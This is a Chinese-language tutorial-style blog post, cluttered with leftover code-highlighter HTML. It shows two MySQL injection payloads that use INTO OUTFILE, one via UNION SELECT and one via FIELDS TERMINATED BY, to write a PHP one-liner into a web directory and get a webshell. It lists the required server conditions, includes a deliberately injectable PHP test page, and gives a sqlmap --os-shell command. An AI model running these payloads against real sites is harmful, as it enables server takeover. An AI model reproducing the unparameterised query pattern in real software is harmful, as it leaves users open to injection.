MySQL注入两种写入一句话快速拿Webshell的方法
利用需要满足以下条件:
- root权限
- GPC关闭(能使用单引号)
- 有绝对路径(读文件可以不用,写文件必须)
- 没有配置–secure-file-priv
1.union
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
| </div>
<div class="crayon-main" style="margin:0px;padding:0px;list-style:none;">
<table class="crayon-table" style="border-spacing:0px;border:1px solid #DDDDDD;text-align:center;">
<tbody>
<tr class="crayon-row">
<td class="crayon-nums " data-settings="show" style="margin:0px;padding:2px;list-style:none;border:1px solid #DDDDDD;">
<div class="crayon-nums-content" style="margin:0px;padding:0px;list-style:none;">
<div class="crayon-num" data-line="crayon-59a43f023b0b0450187454-1" style="margin:0px;padding:0px;list-style:none;">
1
</div>
</div>
</td>
<td class="crayon-code" style="margin:0px;padding:2px;list-style:none;border:1px solid #DDDDDD;">
<div class="crayon-pre" style="margin:0px;padding:0px;list-style:none;">
<div id="crayon-59a43f023b0b0450187454-1" class="crayon-line" style="margin:0px;padding:0px;list-style:none;">
<span class="crayon-i">id</span><span class="crayon-o">=</span><span class="crayon-cn">2</span><span class="crayon-sy">)</span> <span class="crayon-e">union </span><span class="crayon-i">select</span> <span class="crayon-cn">1</span><span class="crayon-sy">,</span><span class="crayon-cn">2</span><span class="crayon-sy">,</span><span class="crayon-cn">3</span><span class="crayon-sy">,</span><span class="crayon-cn">4</span><span class="crayon-sy">,</span><span class="crayon-cn">5</span><span class="crayon-sy">,</span><span class="crayon-cn">6</span><span class="crayon-sy">,</span><span class="crayon-cn">7</span><span class="crayon-sy">,</span>'<span class="crayon-ta"><?</span> <span class="crayon-e">phpinfo</span><span class="crayon-sy">(</span><span class="crayon-sy">)</span><span class="crayon-sy">;</span> <span class="crayon-ta">?></span>’ <span class="crayon-e">into </span><span class="crayon-i">outfile</span> ‘<span class="crayon-o">/</span><span class="crayon-i">home</span><span class="crayon-o">/</span><span class="crayon-i">wwwroot</span><span class="crayon-o">/</span><span class="crayon-i">lu4n</span><span class="crayon-sy">.</span><span class="crayon-i">com</span><span class="crayon-o">/</span><span class="crayon-i">luan_phpinfo</span><span class="crayon-sy">.</span><span class="crayon-i">php</span>’<span class="crayon-o">%</span><span class="crayon-cn">23</span>
</div>
</div>
</td>
</tr>
</tbody>
</table>
</div>
|
<? phpinfo(); ?>为写入的内容可添加自己的一句话 /home/wwwroot/5ime.cn/luan_phpinfo.php 为已存在的网站目录下的文件即插入文件名
2.no union
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
| </div>
<div class="crayon-main" style="margin:0px;padding:0px;list-style:none;">
<table class="crayon-table" style="border-spacing:0px;border:1px solid #DDDDDD;text-align:center;">
<tbody>
<tr class="crayon-row">
<td class="crayon-nums " data-settings="show" style="margin:0px;padding:2px;list-style:none;border:1px solid #DDDDDD;">
<div class="crayon-nums-content" style="margin:0px;padding:0px;list-style:none;">
<div class="crayon-num" data-line="crayon-59a43f023b0b8247295740-1" style="margin:0px;padding:0px;list-style:none;">
1
</div>
</div>
</td>
<td class="crayon-code" style="margin:0px;padding:2px;list-style:none;border:1px solid #DDDDDD;">
<div class="crayon-pre" style="margin:0px;padding:0px;list-style:none;">
<div id="crayon-59a43f023b0b8247295740-1" class="crayon-line" style="margin:0px;padding:0px;list-style:none;">
<span class="crayon-i">id</span><span class="crayon-o">=</span><span class="crayon-cn">2</span><span class="crayon-sy">)</span> <span class="crayon-e">into </span><span class="crayon-i">outfile</span> ‘<span class="crayon-o">/</span><span class="crayon-i">home</span><span class="crayon-o">/</span><span class="crayon-i">wwwroot</span><span class="crayon-o">/</span><span class="crayon-i">lu4n</span><span class="crayon-sy">.</span><span class="crayon-i">com</span><span class="crayon-o">/</span><span class="crayon-i">luan_phpinfo</span><span class="crayon-sy">.</span><span class="crayon-i">php</span>’ <span class="crayon-e">fields</span> <span class="crayon-e">terminated</span> <span class="crayon-e">by</span> ‘<span class="crayon-ta"><?</span> <span class="crayon-e">phpinfo</span><span class="crayon-sy">(</span><span class="crayon-sy">)</span><span class="crayon-sy">;</span> <span class="crayon-ta">?></span>’<span class="crayon-o">%</span><span class="crayon-cn">23</span>
</div>
</div>
</td>
</tr>
</tbody>
</table>
</div>
|
第二种方法最早最早是在吐司的一个 2015-1-24 的帖子里看到的,吐司果然大牛多。 效果如下:
这里用的第二种方法是通过插入分隔符号来getshell的,所以必须查询结果有多个列 一般情况下的注入点都是符合条件的。
sqlmap利用方法
以 luan_test.php 为例:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
| </div>
<div class="crayon-main" style="margin:0px;padding:0px;list-style:none;">
<table class="crayon-table" style="border-spacing:0px;border:1px solid #DDDDDD;text-align:center;">
<tbody>
<tr class="crayon-row">
<td class="crayon-nums " data-settings="show" style="margin:0px;padding:2px;list-style:none;border:1px solid #DDDDDD;">
<div class="crayon-nums-content" style="margin:0px;padding:0px;list-style:none;">
<div class="crayon-num" data-line="crayon-59a43f023b0bc142086430-1" style="margin:0px;padding:0px;list-style:none;">
1
</div>
<div class="crayon-num crayon-striped-num" data-line="crayon-59a43f023b0bc142086430-2" style="margin:0px;padding:0px;list-style:none;">
2
</div>
<div class="crayon-num" data-line="crayon-59a43f023b0bc142086430-3" style="margin:0px;padding:0px;list-style:none;">
3
</div>
<div class="crayon-num crayon-striped-num" data-line="crayon-59a43f023b0bc142086430-4" style="margin:0px;padding:0px;list-style:none;">
4
</div>
<div class="crayon-num" data-line="crayon-59a43f023b0bc142086430-5" style="margin:0px;padding:0px;list-style:none;">
5
</div>
<div class="crayon-num crayon-striped-num" data-line="crayon-59a43f023b0bc142086430-6" style="margin:0px;padding:0px;list-style:none;">
6
</div>
<div class="crayon-num" data-line="crayon-59a43f023b0bc142086430-7" style="margin:0px;padding:0px;list-style:none;">
7
</div>
<div class="crayon-num crayon-striped-num" data-line="crayon-59a43f023b0bc142086430-8" style="margin:0px;padding:0px;list-style:none;">
8
</div>
<div class="crayon-num" data-line="crayon-59a43f023b0bc142086430-9" style="margin:0px;padding:0px;list-style:none;">
9
</div>
<div class="crayon-num crayon-striped-num" data-line="crayon-59a43f023b0bc142086430-10" style="margin:0px;padding:0px;list-style:none;">
10
</div>
<div class="crayon-num" data-line="crayon-59a43f023b0bc142086430-11" style="margin:0px;padding:0px;list-style:none;">
11
</div>
</div>
</td>
<td class="crayon-code" style="margin:0px;padding:2px;list-style:none;border:1px solid #DDDDDD;">
<div class="crayon-pre" style="margin:0px;padding:0px;list-style:none;">
<div id="crayon-59a43f023b0bc142086430-1" class="crayon-line" style="margin:0px;padding:0px;list-style:none;">
<span class="crayon-ta"><?php</span>
</div>
<div id="crayon-59a43f023b0bc142086430-2" class="crayon-line crayon-striped-line" style="margin:0px;padding:0px;list-style:none;">
<span class="crayon-sy">@</span><span class="crayon-v">$link</span><span class="crayon-o">=</span> <span class="crayon-e">mysql_connect</span><span class="crayon-sy">(</span><span class="crayon-s">"localhost"</span><span class="crayon-sy">,</span><span class="crayon-s">"root"</span><span class="crayon-sy">,</span><span class="crayon-s">""</span><span class="crayon-sy">)</span><span class="crayon-sy">;</span>
</div>
<div id="crayon-59a43f023b0bc142086430-3" class="crayon-line" style="margin:0px;padding:0px;list-style:none;">
<span class="crayon-e">mysql_select_db</span><span class="crayon-sy">(</span><span class="crayon-s">"mysql"</span><span class="crayon-sy">,</span><span class="crayon-v">$link</span><span class="crayon-sy">)</span><span class="crayon-sy">;</span>
</div>
<div id="crayon-59a43f023b0bc142086430-4" class="crayon-line crayon-striped-line" style="margin:0px;padding:0px;list-style:none;">
<span class="crayon-v">$user</span> <span class="crayon-o">=</span> <span class="crayon-e">strtolower</span><span class="crayon-sy">(</span><span class="crayon-v">$_GET</span><span class="crayon-sy">[</span><span class="crayon-s">'user'</span><span class="crayon-sy">]</span><span class="crayon-sy">)</span><span class="crayon-sy">;</span>
</div>
<div id="crayon-59a43f023b0bc142086430-5" class="crayon-line" style="margin:0px;padding:0px;list-style:none;">
<span class="crayon-st">if</span><span class="crayon-sy">(</span><span class="crayon-e">strpos</span><span class="crayon-sy">(</span><span class="crayon-v">$user</span><span class="crayon-sy">,</span><span class="crayon-s">"union"</span><span class="crayon-sy">)</span> <span class="crayon-o">===</span> <span class="crayon-t">false</span><span class="crayon-sy">)</span><span class="crayon-sy">{</span>
</div>
<div id="crayon-59a43f023b0bc142086430-6" class="crayon-line crayon-striped-line" style="margin:0px;padding:0px;list-style:none;">
<span class="crayon-v">$sql</span><span class="crayon-o">=</span> <span class="crayon-s">"SELECT * FROM user where user='{$user}'"</span><span class="crayon-sy">;</span>
</div>
<div id="crayon-59a43f023b0bc142086430-7" class="crayon-line" style="margin:0px;padding:0px;list-style:none;">
<span class="crayon-k ">echo</span> <span class="crayon-v">$sql</span> <span class="crayon-sy">.</span> <span class="crayon-s">'<br>'</span><span class="crayon-sy">;</span>
</div>
<div id="crayon-59a43f023b0bc142086430-8" class="crayon-line crayon-striped-line" style="margin:0px;padding:0px;list-style:none;">
<span class="crayon-e">mysql_query</span><span class="crayon-sy">(</span><span class="crayon-v">$sql</span><span class="crayon-sy">)</span><span class="crayon-sy">;</span>
</div>
<div id="crayon-59a43f023b0bc142086430-9" class="crayon-line" style="margin:0px;padding:0px;list-style:none;">
<span class="crayon-k ">echo</span> <span class="crayon-e">mysql_errno</span><span class="crayon-sy">(</span><span class="crayon-sy">)</span> <span class="crayon-sy">.</span> <span class="crayon-s">": "</span> <span class="crayon-sy">.</span> <span class="crayon-e">mysql_error</span><span class="crayon-sy">(</span><span class="crayon-sy">)</span><span class="crayon-sy">.</span> <span class="crayon-s">" "</span><span class="crayon-sy">;</span>
</div>
<div id="crayon-59a43f023b0bc142086430-10" class="crayon-line crayon-striped-line" style="margin:0px;padding:0px;list-style:none;">
<span class="crayon-sy">}</span>
</div>
<div id="crayon-59a43f023b0bc142086430-11" class="crayon-line" style="margin:0px;padding:0px;list-style:none;">
<span class="crayon-ta">?></span>
</div>
</div>
</td>
</tr>
</tbody>
</table>
</div>
|
经测试,sqlmap 最新版实际是支持这个方法的:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
| </div>
<div class="crayon-main" style="margin:0px;padding:0px;list-style:none;">
<table class="crayon-table" style="border-spacing:0px;border:1px solid #DDDDDD;text-align:center;">
<tbody>
<tr class="crayon-row">
<td class="crayon-nums " data-settings="show" style="margin:0px;padding:2px;list-style:none;border:1px solid #DDDDDD;">
<div class="crayon-nums-content" style="margin:0px;padding:0px;list-style:none;">
<div class="crayon-num" data-line="crayon-59a43f023b0be210058938-1" style="margin:0px;padding:0px;list-style:none;">
1
</div>
</div>
</td>
<td class="crayon-code" style="margin:0px;padding:2px;list-style:none;border:1px solid #DDDDDD;">
<div class="crayon-pre" style="margin:0px;padding:0px;list-style:none;">
<div id="crayon-59a43f023b0be210058938-1" class="crayon-line" style="margin:0px;padding:0px;list-style:none;">
<span class="crayon-v">C</span><span class="crayon-o">:</span><span class="crayon-sy">\</span><span class="crayon-v">luan</span><span class="crayon-sy">\</span><span class="crayon-v">sqlmap</span><span class="crayon-o">></span><span class="crayon-e">python </span><span class="crayon-v">sqlmap</span><span class="crayon-e">.py</span> <span class="crayon-o">-</span><span class="crayon-i">u</span> “<span class="crayon-v">http</span><span class="crayon-o">:</span><span class="crayon-o">/</span><span class="crayon-o">/</span><span class="crayon-cn">192.168.2.200</span><span class="crayon-o">/</span><span class="crayon-v">luan_test</span><span class="crayon-e">.php</span><span class="crayon-sy">?</span><span class="crayon-v">user</span><span class="crayon-o">=</span><span class="crayon-i">root</span>” –<span class="crayon-v">os</span><span class="crayon-o">-</span><span class="crayon-v">shell</span>
</div>
</div>
</td>
</tr>
</tbody>
</table>
</div>
|
但是,如果–os-shell用不了,sqlmap有个写文件的选项,经测试不成功,也就是说,sqlmap只能传自己的webshell。
如果工具党遇到这种情况,直接使用sqlmap –os-shell然后用sqlmap上传的Webshell来操作就可以了。
